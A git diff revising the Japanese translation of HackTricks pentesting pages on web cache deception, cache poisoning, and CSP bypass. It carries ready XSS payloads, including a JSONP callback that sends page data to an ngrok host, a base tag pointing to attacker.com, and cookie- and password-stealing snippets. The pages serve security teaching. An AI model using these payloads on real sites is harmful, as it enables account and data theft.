-この例では、存在しないページ（例：_http://www.example.com/home.php/non-existent.css_）を読み込むと、_http://www.example.com/home.php_（**ユーザーの機密情報を含む**）の内容が返され、キャッシュサーバーが結果を保存することが説明されています。\
-その後、**攻撃者**は自分のブラウザで_http://www.example.com/home.php/non-existent.css_にアクセスし、以前にアクセスしたユーザーの**機密情報**を観察できます。
+この例では、_http://www.example.com/home.php/non-existent.css_のような存在しないページを読み込むと、_http://www.example.com/home.php_（**ユーザーの機密情報を含む**）の内容が返され、キャッシュサーバーが結果を保存することが説明されています。\
+その後、**攻撃者**は自分のブラウザで_http://www.example.com/home.php/non-existent.css_にアクセスし、以前にアクセスしたユーザーの**機密情報**を観察することができます。
 
-**キャッシュプロキシ**は、ファイルの**拡張子**（_.css_）に基づいてファイルを**キャッシュ**するように**設定されるべき**であり、コンテンツタイプに基づいてはなりません。例として、_http://www.example.com/home.php/non-existent.css_は、_.css_ファイルに期待される`text/css` MIMEタイプの代わりに`text/html`コンテンツタイプを持ちます。
+**キャッシュプロキシ**は、ファイルの**拡張子**（_.css_）に基づいてファイルを**キャッシュ**するように**設定**されるべきであり、コンテンツタイプに基づいてはなりません。例として_http://www.example.com/home.php/non-existent.css_は、_.css_ファイルに期待される`text/css` MIMEタイプの代わりに`text/html`コンテンツタイプを持ちます。
 
-[Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)の実施方法について学びましょう。
+[Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)の実施方法についてここで学びます。
 
 ## 自動ツール
 
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
index 1c7be0a83..ad9367caf 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
@@ -3,7 +3,7 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!CAUTION]
-> このページでは、**キャッシュサーバーに対して有効なリクエスト**に対して**ウェブサーバーがエラーで応答する**ように試みるさまざまなバリエーションを見つけることができます。
+> このページでは、**キャッシュサーバーに対して有効なリクエスト**に対して、**ウェブサーバーがエラーで応答する**ようにするためのさまざまなバリエーションを見つけることができます。
 
 - **HTTP Header Oversize (HHO)**
 
@@ -23,7 +23,7 @@ X-Meta-Hedear:Bad Chars\n \r
 ```
 不適切に構成されたヘッダーは、単に `\:` というヘッダーである可能性があります。
 
-予期しない値が送信される場合、例えば予期しない Content-Type: の場合もこれが機能する可能性があります。
+予期しない値が送信される場合、例えば予期しない Content-Type: の場合も、これが機能する可能性があります。
 ```
 GET /anas/repos HTTP/2
 Host: redacted.com
@@ -105,7 +105,7 @@ Not Found
 ```
 - **Fat Get**
 
-一部のキャッシュサーバー（Cloudflareなど）やウェブサーバーは、ボディを持つGETリクエストを停止するため、無効なレスポンスをキャッシュするために悪用される可能性があります。
+一部のキャッシュサーバー、例えばCloudflareやウェブサーバーは、ボディを持つGETリクエストを停止するため、無効なレスポンスをキャッシュするために悪用される可能性があります。
 ```
 GET /index.html HTTP/2
 Host: redacted.com
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
index 7b66aa832..28a266ec8 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
@@ -2,23 +2,23 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-これは、キャッシュポイズニング攻撃を実行するために提案された技術の概要です **キャッシュプロキシとウェブサーバー間の不一致を悪用することによって。**
+これは、キャッシュプロキシとウェブサーバー間の不一致を悪用してキャッシュポイズニング攻撃を実行するために提案された技術の概要です **キャッシュポイズニング攻撃を実行するための技術の概要です。**
 
 > [!NOTE]
-> この攻撃の目的は、**キャッシュサーバーに静的リソースが読み込まれていると認識させること**です。これにより、キャッシュサーバーはパスの一部をキャッシュキーとして保存しながらキャッシュしますが、ウェブサーバーは別のパスを解決して応答します。ウェブサーバーは、ユーザーに関する機密情報や、XSSのような悪意のあるペイロード、または攻撃者のウェブサイトからJSファイルを読み込むためのリダイレクトを含む動的ページを読み込む実際のパスを解決します。
+> この攻撃の目的は、**キャッシュサーバーに静的リソースが読み込まれていると誤認させること**です。これにより、キャッシュサーバーはパスの一部をキャッシュキーとして保存しながらキャッシュしますが、ウェブサーバーは別のパスを解決して応答します。ウェブサーバーは、ユーザーに関する機密情報や、XSSのような悪意のあるペイロード、または攻撃者のウェブサイトからJSファイルを読み込むためのリダイレクトを含む動的ページを読み込む実際のパスを解決します。
 
 ## デリミタ
 
-**URLデリミタ**はフレームワークやサーバーによって異なり、リクエストのルーティングやレスポンスの処理に影響を与えます。一般的なオリジンデリミタには以下があります：
+**URLデリミタ**はフレームワークやサーバーによって異なり、リクエストのルーティングや応答の処理に影響を与えます。一般的なオリジンデリミタには以下があります：
 
 - **セミコロン**: Springでマトリックス変数に使用されます（例: `/hello;var=a/world;var1=b;var2=c` → `/hello/world`）。
-- **ドット**: Ruby on Railsでレスポンス形式を指定します（例: `/MyAccount.css` → `/MyAccount`）。
+- **ドット**: Ruby on Railsで応答形式を指定します（例: `/MyAccount.css` → `/MyAccount`）。
 - **ヌルバイト**: OpenLiteSpeedでパスを切り詰めます（例: `/MyAccount%00aaa` → `/MyAccount`）。
 - **ニューラインバイト**: NginxでURLコンポーネントを分離します（例: `/users/MyAccount%0aaaa` → `/account/MyAccount`）。
 
 このプロセスに従って他の特定のデリミタが見つかるかもしれません：
 
-- **ステップ1**: キャッシュ不可のリクエストを特定し、それを使用して潜在的なデリミタを持つURLがどのように処理されるかを監視します。
+- **ステップ1**: キャッシュ不可のリクエストを特定し、それを使用して潜在的なデリミタを含むURLがどのように処理されるかを監視します。
 - **ステップ2**: パスにランダムなサフィックスを追加し、サーバーの応答を比較して、文字がデリミタとして機能するかどうかを判断します。
 - **ステップ3**: ランダムなサフィックスの前に潜在的なデリミタを導入し、応答が変わるかどうかを確認して、デリミタの使用を示します。
 
@@ -47,6 +47,6 @@
 - **よく知られた静的ディレクトリ**: 以下のディレクトリには静的ファイルが含まれているため、その応答はキャッシュされるべきです: /static, /assets, /wp-content, /media, /templates, /public, /shared
 - デリミタ、静的ディレクトリ、ドットを使用して動的応答をキャッシュに強制することが可能で、例えば `/home/..%2fstatic/something` は `/static/something` をキャッシュし、応答は `/home` になります。
 - **静的ディレクトリ + ドット**: `/static/..%2Fhome` へのリクエストや `/static/..%5Chome` へのリクエストはそのままキャッシュされるかもしれませんが、応答は `/home` かもしれません。
-- **静的ファイル**: `/robots.txt`、`/favicon.ico`、および `/index.html` のような特定のファイルは常にキャッシュされます。これは `/home/..%2Frobots.txt` のように悪用される可能性があり、キャッシュは `/robots.txt` を保存し、オリジンサーバーは `/home` に応答します。
+- **静的ファイル**: `/robots.txt`、`/favicon.ico`、および `/index.html` のような特定のファイルは常にキャッシュされます。これらは `/home/..%2Frobots.txt` のように悪用される可能性があり、キャッシュは `/robots.txt` を保存し、オリジンサーバーは `/home` に応答します。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
index 5dce39498..58e03a9d4 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -21,7 +21,7 @@ Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com;
 CSPはこれらのヘッダーを使用して強制または監視できます：
 
 - `Content-Security-Policy`: CSPを強制します; ブラウザは違反をブロックします。
-- `Content-Security-Policy-Report-Only`: 監視に使用されます; 違反を報告しますが、ブロックはしません。プレプロダクション環境でのテストに最適です。
+- `Content-Security-Policy-Report-Only`: 監視用に使用されます; 違反を報告しますが、ブロックはしません。プレプロダクション環境でのテストに最適です。
 
 ### リソースの定義
 
@@ -37,7 +37,7 @@ frame-src 'self' https://ic.paypal.com https://paypal.com;
 media-src https://videos.cdn.mozilla.net;
 object-src 'none';
 ```
-### ディレクティブ
+### 指令
 
 - **script-src**: JavaScriptの特定のソースを許可します。これには、URL、インラインスクリプト、イベントハンドラーやXSLTスタイルシートによってトリガーされるスクリプトが含まれます。
 - **default-src**: 特定のフェッチディレクティブが存在しない場合にリソースを取得するためのデフォルトポリシーを設定します。
@@ -52,10 +52,10 @@ object-src 'none';
 - **object-src**: `<object>`、`<embed>`、および`<applet>`要素のために許可されたソースを定義します。
 - **base-uri**: `<base>`要素を使用して読み込むための許可されたURLを指定します。
 - **form-action**: フォーム送信のための有効なエンドポイントをリストします。
-- **plugin-types**: ページが呼び出すことができるmimeタイプを制限します。
+- **plugin-types**: ページが呼び出すことができるMIMEタイプを制限します。
 - **upgrade-insecure-requests**: ブラウザにHTTP URLをHTTPSに書き換えるよう指示します。
 - **sandbox**: `<iframe>`のsandbox属性に似た制限を適用します。
-- **report-to**: ポリシーが違反された場合にレポートが送信されるグループを指定します。
+- **report-to**: ポリシーが違反された場合に報告が送信されるグループを指定します。
 - **worker-src**: Worker、SharedWorker、またはServiceWorkerスクリプトのための有効なソースを指定します。
 - **prefetch-src**: フェッチまたはプリフェッチされるリソースのための有効なソースを指定します。
 - **navigate-to**: ドキュメントがあらゆる手段（a、form、window.location、window.openなど）でナビゲートできるURLを制限します。
@@ -69,8 +69,8 @@ object-src 'none';
 - `'unsafe-eval'`: `eval()`や類似のメソッドの使用を許可しますが、セキュリティ上の理由から推奨されません。
 - `'unsafe-hashes'`: 特定のインラインイベントハンドラーを有効にします。
 - `'unsafe-inline'`: インライン`<script>`や`<style>`のようなインラインリソースの使用を許可しますが、セキュリティ上の理由から推奨されません。
-- `'nonce'`: 暗号的なノンス（1回使用される番号）を使用する特定のインラインスクリプトのホワイトリストです。
-- JSの実行が制限されている場合、`doc.defaultView.top.document.querySelector("[nonce]")`を使用してページ内の使用済みノンスを取得し、それを再利用して悪意のあるスクリプトを読み込むことが可能です（strict-dynamicが使用されている場合、許可されたソースは新しいソースを読み込むことができるため、これは必要ありません）。以下のように：
+- `'nonce'`: 暗号的なノンス（1回限り使用される番号）を使用した特定のインラインスクリプトのホワイトリストです。
+- JSの実行が制限されている場合、`doc.defaultView.top.document.querySelector("[nonce]")`を使用してページ内の使用済みノンスを取得し、それを再利用して悪意のあるスクリプトを読み込むことが可能です（strict-dynamicが使用されている場合、許可されたソースは新しいソースを読み込むことができるため、これは必要ありません）。次のように：
 
 <details>
 
@@ -139,7 +139,7 @@ Content-Security-Policy: script-src 'self' https://google.com https: data *;
 ```
 ### object-src と default-src の欠如
 
-> [!CAUTION] > **これがもう機能していないようです**
+> [!CAUTION] > **これはもはや機能していないようです**
 ```yaml
 Content-Security-Policy: script-src 'self' ;
 ```
@@ -161,13 +161,13 @@ JSファイルをアップロードできる場合、このCSPをバイパスで
 ```
 しかし、サーバーが**アップロードされたファイルを検証している**可能性が高く、**特定のタイプのファイルのみをアップロードすることを許可する**でしょう。
 
-さらに、サーバーが受け入れる拡張子を持つファイルに**JSコードを含めてアップロードできたとしても**（例えば、_script.png_のように）、これは十分ではありません。なぜなら、Apacheサーバーのような一部のサーバーは**拡張子に基づいてファイルのMIMEタイプを選択し**、Chromeのようなブラウザは**画像であるべきものの中でJavascript**コードを**実行することを拒否します**。「幸運にも」、間違いがあります。例えば、CTFから学んだことですが、**Apacheは**_**.wave**_拡張子を知らないため、**audio/***のような**MIMEタイプで提供しません**。
+さらに、サーバーが受け入れる拡張子を持つファイルに**JSコードを含めてアップロードできたとしても**（例えば、_script.png_のように）、これは十分ではありません。なぜなら、Apacheサーバーのような一部のサーバーは**拡張子に基づいてファイルのMIMEタイプを選択し**、Chromeのようなブラウザは**画像であるべきものの中のJavascript**コードを**実行することを拒否する**からです。「幸運にも」、間違いがあります。例えば、CTFから学んだことですが、**Apacheは**_**.wave**_拡張子を**知らないため、audio/\***のような**MIMEタイプで提供しません**。
 
-ここから、XSSとファイルアップロードを見つけ、**誤解された拡張子**を見つけた場合、その拡張子を持つファイルとスクリプトの内容をアップロードしようとすることができます。また、サーバーがアップロードされたファイルの正しい形式をチェックしている場合、ポリグロットを作成することができます（[ここにいくつかのポリグロットの例があります](https://github.com/Polydet/polyglot-database)）。
+ここから、XSSとファイルアップロードを見つけ、**誤解された拡張子**を見つけることができれば、その拡張子を持つファイルとスクリプトの内容をアップロードしようとすることができます。また、サーバーがアップロードされたファイルの正しい形式をチェックしている場合は、ポリグロットを作成することができます（[ここにいくつかのポリグロットの例があります](https://github.com/Polydet/polyglot-database)）。
 
 ### フォームアクション
 
-JSを注入することが不可能な場合でも、例えば資格情報を**フォームアクションを注入することで**流出させることを試みることができます（そして、パスワードマネージャーがパスワードを自動入力することを期待するかもしれません）。[**このレポートに例があります**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)ので、確認してください。また、`default-src`はフォームアクションをカバーしていないことに注意してください。
+JSを注入することが不可能な場合でも、例えば資格情報を**フォームアクションを注入することで**流出させることを試みることができます（そして、パスワードマネージャーが自動的にパスワードを入力することを期待するかもしれません）。[**このレポートに例があります**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)ので、確認してください。また、`default-src`はフォームアクションをカバーしていないことに注意してください。
 
 ### サードパーティエンドポイント + ('unsafe-eval')
 
@@ -176,7 +176,7 @@ JSを注入することが不可能な場合でも、例えば資格情報を**
 ```yaml
 Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
 ```
-脆弱なバージョンのangularをロードし、任意のJSを実行します:
+脆弱なバージョンのAngularをロードし、任意のJSを実行します:
 ```xml
 <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
 <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@@ -243,7 +243,7 @@ ng-init="c.init()"
 
 <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
 ```
-より多くの[**この書き込みからのペイロード**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
+より多くの[**このレポートからのペイロード**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
 ```html
 <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
 
@@ -284,13 +284,13 @@ Content-Security-Policy: script-src 'self' https://www.google.com https://www.yo
 https://www.youtube.com/oembed?callback=alert;
 <script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
 ```
-[**JSONBee**](https://github.com/zigoo0/JSONBee) **は、さまざまなウェブサイトのCSPバイパス用の使用可能なJSONPエンドポイントを含んでいます。**
+[**JSONBee**](https://github.com/zigoo0/JSONBee) **は、さまざまなウェブサイトのCSPバイパス用の即使用可能なJSONPエンドポイントを含んでいます。**
 
-**信頼されたエンドポイントにオープンリダイレクトが含まれている**場合、同じ脆弱性が発生します。なぜなら、初期のエンドポイントが信頼されている場合、リダイレクトも信頼されるからです。
+**信頼されたエンドポイントにオープンリダイレクトが含まれている場合**、同じ脆弱性が発生します。なぜなら、初期のエンドポイントが信頼されている場合、リダイレクトも信頼されるからです。
 
 ### 第三者の悪用
 
-[以下の投稿](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses)で説明されているように、CSPのどこかで許可されている可能性のある多くの第三者ドメインがあり、これらはデータを抽出したり、JavaScriptコードを実行したりするために悪用される可能性があります。これらの第三者の一部は次のとおりです：
+[以下の投稿](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses)で説明されているように、CSPのどこかで許可されている可能性のある多くの第三者ドメインが、データを抽出したりJavaScriptコードを実行したりするために悪用される可能性があります。これらの第三者の一部は次のとおりです：
 
 | エンティティ         | 許可されたドメイン                          | 機能         |
 | ----------------- | -------------------------------------------- | ------------ |
@@ -303,7 +303,7 @@ https://www.youtube.com/oembed?callback=alert;
 | Salesforce Heroku | \*.herokuapp.com                             | Exfil, Exec  |
 | Google Firebase   | \*.firebaseapp.com                           | Exfil, Exec  |
 
-ターゲットのCSPに許可されたドメインが見つかった場合、第三者サービスに登録することでCSPをバイパスし、そのサービスにデータを抽出したり、コードを実行したりできる可能性があります。
+ターゲットのCSPに許可されたドメインが見つかった場合、第三者サービスに登録することでCSPをバイパスし、そのサービスにデータを抽出したりコードを実行したりできる可能性があります。
 
 例えば、次のCSPが見つかった場合：
 ```
@@ -329,13 +329,13 @@ fbq('trackCustom', 'My-Custom-Event',{​
 data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
 });
 ```
-前の表で指定された他の7つのサードパーティドメインについては、それらを悪用する方法が他にもたくさんあります。その他のサードパーティの悪用に関する追加の説明については、以前の[ブログ投稿](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses)を参照してください。
+前の表に指定された他の7つのサードパーティドメインについては、それらを悪用する方法が他にもたくさんあります。その他のサードパーティの悪用についての追加説明は、以前の[ブログ投稿](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses)を参照してください。
 
 ### RPO（相対パス上書き）によるバイパス <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
 
-前述のパス制限を回避するためのリダイレクションに加えて、いくつかのサーバーで使用できる相対パス上書き（RPO）と呼ばれる別の技術があります。
+前述のパス制限を回避するためのリダイレクションに加えて、いくつかのサーバーで使用できる相対パス上書き（RPO）という別の技術があります。
 
-たとえば、CSPがパス`https://example.com/scripts/react/`を許可している場合、次のようにバイパスできます：
+例えば、CSPがパス`https://example.com/scripts/react/`を許可している場合、次のようにバイパスできます：
 ```html
 <script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
 ```
@@ -343,7 +343,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 
 これは、ブラウザにとって `https://example.com/scripts/react/` の下にある `..%2fangular%2fangular.js` という名前のファイルを読み込んでいるため、CSPに準拠しています。
 
-∑、彼らはそれをデコードし、実際には `https://example.com/scripts/react/../angular/angular.js` をリクエストします。これは `https://example.com/scripts/angular/angular.js` と同等です。
+∑、彼らはそれをデコードし、実際には `https://example.com/scripts/react/../angular/angular.js` を要求します。これは `https://example.com/scripts/angular/angular.js` と同等です。
 
 **ブラウザとサーバー間のURL解釈の不一致を利用することで、パスルールをバイパスできます**。
 
@@ -357,11 +357,11 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 ../xss-cross-site-scripting/iframes-in-xss-and-csp.md
 {{#endref}}
 
-### **base-uri** が欠落している
+### **base-uri** が欠落している場合
 
-**base-uri** ディレクティブが欠落している場合、[**ダンギングマークアップインジェクション**](../dangling-markup-html-scriptless-injection/)を実行するために悪用できます。
+**base-uri** ディレクティブが欠落している場合、[**ダングリングマークアップインジェクション**](../dangling-markup-html-scriptless-injection/)を実行するために悪用できます。
 
-さらに、**相対パスを使用してスクリプトを読み込んでいるページ**（例えば `<script src="/js/app.js">`）が **Nonce** を使用している場合、**base** **タグ** を悪用して **自分のサーバーからスクリプトを読み込ませ、XSSを達成することができます。**\
+さらに、**相対パスを使用してスクリプトを読み込んでいるページ**（例えば `<script src="/js/app.js">`）が **Nonce** を使用している場合、**base** **タグ**を悪用して**自分のサーバーからスクリプトを読み込ませ、XSSを達成できます。**\
 脆弱なページが **httpS** で読み込まれている場合、baseにhttpS URLを使用してください。
 ```html
 <base href="https://www.attacker.com/" />
@@ -370,7 +370,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 
 特定のポリシーであるContent Security Policy (CSP)は、JavaScriptイベントを制限する場合があります。それにもかかわらず、AngularJSは代替としてカスタムイベントを導入します。イベント内で、AngularJSはネイティブブラウザイベントオブジェクトを参照するユニークなオブジェクト`$event`を提供します。この`$event`オブジェクトはCSPを回避するために悪用される可能性があります。特に、Chromeでは、`$event/event`オブジェクトは`path`属性を持ち、イベントの実行チェーンに関与するオブジェクトの配列を保持しており、`window`オブジェクトは常に最後に位置しています。この構造はサンドボックスエスケープ戦術にとって重要です。
 
-この配列を`orderBy`フィルターに向けることで、反復処理が可能になり、端末要素（`window`オブジェクト）を利用して`alert()`のようなグローバル関数をトリガーできます。以下のコードスニペットはこのプロセスを明示しています：
+この配列を`orderBy`フィルターに渡すことで、反復処理が可能になり、端末要素（`window`オブジェクト）を利用して`alert()`のようなグローバル関数をトリガーできます。以下のコードスニペットはこのプロセスを明示しています：
 ```xml
 <input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
 ?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
@@ -383,7 +383,7 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
 ```
 Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
 ```
-Angular JSアプリケーションでスクリプト読み込みのためにドメインをホワイトリストするCSPポリシーは、コールバック関数の呼び出しや特定の脆弱なクラスを通じてバイパスされる可能性があります。この技術に関する詳細情報は、この[gitリポジトリ](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22)で入手できます。
+Angular JSアプリケーションでスクリプトの読み込みのためにドメインをホワイトリストするCSPポリシーは、コールバック関数の呼び出しや特定の脆弱なクラスを通じてバイパスされる可能性があります。この技術に関する詳細情報は、この[gitリポジトリ](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22)で入手できます。
 
 動作するペイロード:
 ```html
@@ -401,7 +401,7 @@ CSPがサーバーサイドのリダイレクションに遭遇した場合、
 
 しかし、[CSP仕様4.2.2.3. パスとリダイレクション](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects)の説明によれば、リダイレクションが異なるパスに向かう場合、元の制限をバイパスすることができます。
 
-以下はその例です：
+例を示します：
 ```html
 <!DOCTYPE html>
 <html>
@@ -419,11 +419,11 @@ content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" />
 </body>
 </html>
 ```
-CSPが`https://www.google.com/a/b/c/d`に設定されている場合、パスが考慮されるため、両方の`/test`および`/a/test`スクリプトはCSPによってブロックされます。
+CSPが`https://www.google.com/a/b/c/d`に設定されている場合、パスが考慮されるため、`/test`および`/a/test`スクリプトはCSPによってブロックされます。
 
-しかし、最終的な`http://localhost:5555/301`は**サーバー側で`https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`にリダイレクトされます**。リダイレクションであるため、**パスは考慮されず**、**スクリプトは読み込まれることができ**、したがってパス制限を回避します。
+しかし、最終的な`http://localhost:5555/301`は**サーバー側で`https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`にリダイレクトされます**。リダイレクトであるため、**パスは考慮されず**、**スクリプトは読み込まれることができ**、したがってパス制限を回避します。
 
-このリダイレクションにより、パスが完全に指定されていても、依然として回避されます。
+このリダイレクトにより、パスが完全に指定されていても、依然として回避されます。
 
 したがって、最良の解決策は、ウェブサイトにオープンリダイレクトの脆弱性がないことを確認し、CSPルールで悪用できるドメインがないことです。
 
@@ -435,9 +435,9 @@ CSPが`https://www.google.com/a/b/c/d`に設定されている場合、パスが
 ```
 default-src 'self' 'unsafe-inline'; img-src *;
 ```
-`'unsafe-inline'`は、コード内の任意のスクリプトを実行できることを意味します（XSSはコードを実行できます）し、`img-src *`は、ウェブページで任意のリソースからの画像を使用できることを意味します。
+`'unsafe-inline'`は、コード内の任意のスクリプトを実行できることを意味します（XSSはコードを実行できます）し、`img-src *`は、ウェブページで任意のリソースから任意の画像を使用できることを意味します。
 
-このCSPは、画像を介してデータを抽出することでバイパスできます（この場合、XSSはCSRFを悪用し、ボットがアクセスできるページにSQLiが含まれており、画像を介してフラグを抽出します）：
+このCSPは、画像を介してデータを抽出することでバイパスできます（この場合、XSSはボットがアクセスできるページにSQLiが含まれており、画像を介してフラグを抽出します）：
 ```javascript
 <script>
 fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new
@@ -462,7 +462,7 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](
 
 #### Chrome
 
-あなたが送信した**パラメータ**が**ポリシーの宣言内に貼り付けられている**場合、あなたは**ポリシーを変更**して**無効にする**ことができます。これらのバイパスのいずれかを使用して、**スクリプト 'unsafe-inline' を許可**することができます:
+あなたが送信した**パラメータ**が**ポリシーの宣言内に貼り付けられている**場合、あなたは**ポリシーを変更**して**無効にする**ことができます。これらのバイパスのいずれかを使用して、**スクリプト 'unsafe-inline'を許可**することができます:
 ```bash
 script-src-elem *; script-src-attr *
 script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
@@ -478,7 +478,7 @@ Edgeでははるかに簡単です。CSPにこれを追加するだけで: **`;_
 ### img-src \*; via XSS (iframe) - タイムアタック
 
 ディレクティブ `'unsafe-inline'` の欠如に注意してください。\
-今回は、被害者に**あなたの制御下にある**ページを**XSS**を介して`<iframe>`で**読み込ませる**ことができます。今回は、情報を抽出したいページに被害者がアクセスするようにします（**CSRF**）。ページの内容にはアクセスできませんが、もし何らかの方法で**ページの読み込みにかかる時間を制御できれば**、必要な情報を抽出できます。
+今回は、被害者に**あなたの制御下にある**ページを**XSS**を介して**<iframe>**で**読み込ませることができます。この時、被害者に情報を抽出したいページにアクセスさせます（**CSRF**）。ページの内容にはアクセスできませんが、もし何らかの方法で**ページの読み込みに必要な時間を制御できれば**、必要な情報を抽出できます。
 
 今回は、**フラグ**が抽出されます。SQLiを介して**文字が正しく推測される**たびに、**レスポンス**が**より多くの時間**を要します。これはスリープ関数によるものです。そうすれば、フラグを抽出できるようになります。
 ```html
@@ -550,7 +550,7 @@ run()
 
 [**このCTFの解説**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)では、許可されたiframe内により制限されたCSPを注入することでCSPがバイパスされ、特定のJSファイルの読み込みが禁止され、その後、**プロトタイプ汚染**または**DOMクラッタリング**を介して**異なるスクリプトを悪用して任意のスクリプトを読み込む**ことが可能になりました。
 
-**`csp`**属性を使用して、**iframeのCSPを制限する**ことができます：
+**`csp`**属性を使用して、**iframeのCSPを制限する**ことができます:
 ```html
 <iframe
 src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]"
@@ -568,9 +568,9 @@ content="script-src 'self'
 ```
 ### JS exfiltration with Content-Security-Policy-Report-Only
 
-サーバーが**`Content-Security-Policy-Report-Only`**ヘッダーを**あなたが制御する値**（おそらくCRLFのため）で応答するように管理できれば、あなたのサーバーを指すように設定でき、**JSコンテンツ**を**`<script>`**でラップすると、CSPによって`unsafe-inline`が許可されていない可能性が高いため、これが**CSPエラー**を引き起こし、スクリプトの一部（機密情報を含む）が`Content-Security-Policy-Report-Only`からサーバーに送信されます。
+サーバーが**`Content-Security-Policy-Report-Only`**ヘッダーを**あなたが制御する値**で応答するように管理できれば（おそらくCRLFのため）、あなたのサーバーを指すように設定でき、**`<script>`**で包んだ**JSコンテンツ**を外部に流出させることができます。そして、CSPによって`unsafe-inline`が許可されていない可能性が高いため、これが**CSPエラー**を引き起こし、スクリプトの一部（機密情報を含む）が`Content-Security-Policy-Report-Only`からサーバーに送信されます。
 
-例として[**このCTFの解説を確認してください**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)。
+例については[**このCTFの解説を確認してください**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)。
 
 ### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
 ```javascript
@@ -591,26 +591,26 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
 ```
 CSPによってブロックまたは許可されるリクエストを監視することで、秘密のサブドメインに含まれる可能性のある文字を絞り込み、最終的に完全なURLを明らかにすることができます。
 
-両方の方法は、CSPの実装とブラウザの動作のニュアンスを利用しており、一見安全なポリシーが意図せずに機密情報を漏洩させる可能性があることを示しています。
+両方の方法は、CSPの実装とブラウザの動作のニュアンスを利用しており、一見安全なポリシーがどのようにして意図せずに機密情報を漏洩させるかを示しています。
 
-Trick from [**here**](https://ctftime.org/writeup/29310).
+[**ここ**](https://ctftime.org/writeup/29310)からのトリック。
 
 ## CSPをバイパスするための危険な技術
 
 ### パラメータが多すぎるときのPHPエラー
 
-[**この動画でコメントされた最後の技術**](https://www.youtube.com/watch?v=Sm4G6cAHjWM)によると、パラメータを多く送信すると（1001のGETパラメータ、POSTパラメータや20以上のファイルでも可能）、PHPウェブコードで定義された**`header()`**は、このエラーが発生するため**送信されません**。
+この[**動画でコメントされた最後の技術**](https://www.youtube.com/watch?v=Sm4G6cAHjWM)によると、パラメータを多く送信すると（1001のGETパラメータ、POSTパラメータや20以上のファイルでも可能）、PHPウェブコードで定義された**`header()`**は、このエラーが発生するため**送信されません**。
 
 ### PHPレスポンスバッファのオーバーロード
 
-PHPはデフォルトで**4096**バイトまでレスポンスを**バッファリング**することで知られています。したがって、PHPが警告を表示している場合、**警告内に十分なデータを提供することで**、**レスポンス**が**CSPヘッダーの前に送信され**、ヘッダーが無視されることになります。\
